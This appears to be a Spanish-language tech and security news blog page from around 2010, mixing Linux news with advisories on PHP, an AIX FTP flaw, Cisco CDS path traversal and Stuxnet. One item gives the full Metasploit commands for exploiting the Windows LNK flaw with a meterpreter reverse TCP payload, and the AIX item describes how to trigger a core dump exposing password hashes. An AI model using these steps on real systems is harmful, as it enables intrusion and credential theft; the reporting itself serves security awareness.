Las distribuciones Linux más populares en el entorno del escritorio suelen ser muy conocidas por los usuarios: Ubuntu, openSUSE, Mandriva, Fedora o Debian se encuentran en ese grupo de privilegiadas que suelen ser consideradas como las primeras alternativas entre los usuarios de este sistema operativo.
Nuevas versiones de PHP solucionan varios fallos de seguridad
Se han publicado recientemente nuevas versiones de PHP (versiones 5.2.14 y 5.3.3) que solucionan múltiples problemas de seguridad, que podrían permitir evitar restricciones de seguridad, provocar denegaciones de servicio, obtener información sensible o comprometer los sistemas afectados.
PHP es un lenguaje interpretado de propósito general ampliamente usado, que está diseñado para desarrollo web y puede ser embebido dentro de código HTML. PHP está orientado a la creación de páginas web dinámicas, ejecutándose en un servidor web (server-side scripting), de forma que primero se toma el código en PHP como entrada y se devuelven las páginas web como salida.
Revelación de información a través del servidor FTP de AIX 5.x
Existe un fallo en el servidor FTP a la hora de manejar comandos NLST a los que se le pasan parámetros especialmente manipulados. Esto podría ser aprovechado por un atacante remoto para provocar un volcado del core del proceso FTP accesible por este medio. Entre esos datos, podrían encontrarse hashes de contraseñas.
Un atacante podría enviar un comando NLST a un servidor FTP (al que se debe tener previamente acceso aunque sea con cuenta de enviado) seguido de unos 5000 caracteres para provcar el volcado. Luego el fichero con los hashes (que previamente debe generar con intentos fallidos de adivinar la contraseña) quedará accesible para descarga.
Escalada de directorios en Cisco Content Delivery System
Cisco ha anunciado la existencia de una vulnerabilidad en Cisco Content Delivery System (CDS), y que podría permitir a un atacante conseguir acceso no autorizado a archivos arbitrarios de los sistemas afectados.
El problema reside en un error de validación de entradas en el servidor web de la aplicación Internet Streamer, que un atacante podría aprovechar para acceder a los contenidos de cualquier archivo (archivos de contraseñas, logs, configuraciónes, etc.) mediante ataques de escalada de directorios.
Aplicaciones “portables” para Linux
Portable Linux Apps es una gran iniciativa del proyecto Elementary, que pretende traer aplicaciones portátiles a Linux, tal como las ya conocidas Portable Apps para Windows, solo que tiene varias características que lo ponen varios peldaños arriba. Esto lo logran mediante un nuevo formato de archivo llamado AppImage que utiliza un único archivo para una aplicación completa, y lo mas interesante es que puede ser ejecutada indistintamente en cualquier distro Linux, probada con éxito hasta ahora en Ubuntu, Fedora y openSUSE.
Open Source en la NASA
Un interesante artículo de Internet News nos revela cómo la NASA, uno de los organismos más importantes a nivel científico y tecnológico en todo el mundo,hace buen uso del software Open Source y de distribuciones Linux como Ubuntu.
Las 10 mejores distros de 2010 según TechRadar
En MyLinux han publicado un articulo sobre las mejores distribuciones del 2010 segun TechRadar. aunque ami personalmente no convence del todo el listado, pienso igual que ellos, para gustos los colores
Instalar Mandriva Enterprise Server y Administrar graficamente Controlador de Dominio Principal (PDC)
Nunca había instalado un Mandriva, y la verdad… que a la hora de la instalación es muy sencilla y muy intuitiva. Y es mi primera vez con un Server bajo GNU/Linux con interfaz grafica.
Herramientas a utilizar:Oracle VM Virtualbox ( En mi caso voy a virtualizar el servidor)
Mandriva Enterprise Server 5
Cliente Windows
Descargar Mandriva Enterprise ServerExplotando «LNK» con MetaSploit
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/
La nueva variante del Stuxnet vuelve a estar firmada con un certificado válid
El último ataque contra Windows (con enlaces directos) fue descubierto a través de un troyano que ha sido bautizado como Stuxnet. Una de sus características era que los drivers que usaba estaban firmados digitalmente por la famosa empresa china Realtek. Ahora, después de que hayan sido revocados, los atacantes han comenzado a utilizar los de otra empresa legítima: JMicron Technology Corporation.
Los drivers de Stuxnet utilizados como rootkit, estaban firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código… excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Parece que ante este «contratiempo» los atacantes han reaccionado firmando su troyano de nuevo con un certificado válido de otra empresa Taiwanesa dedicada también a crear controladores, llamada JMicron.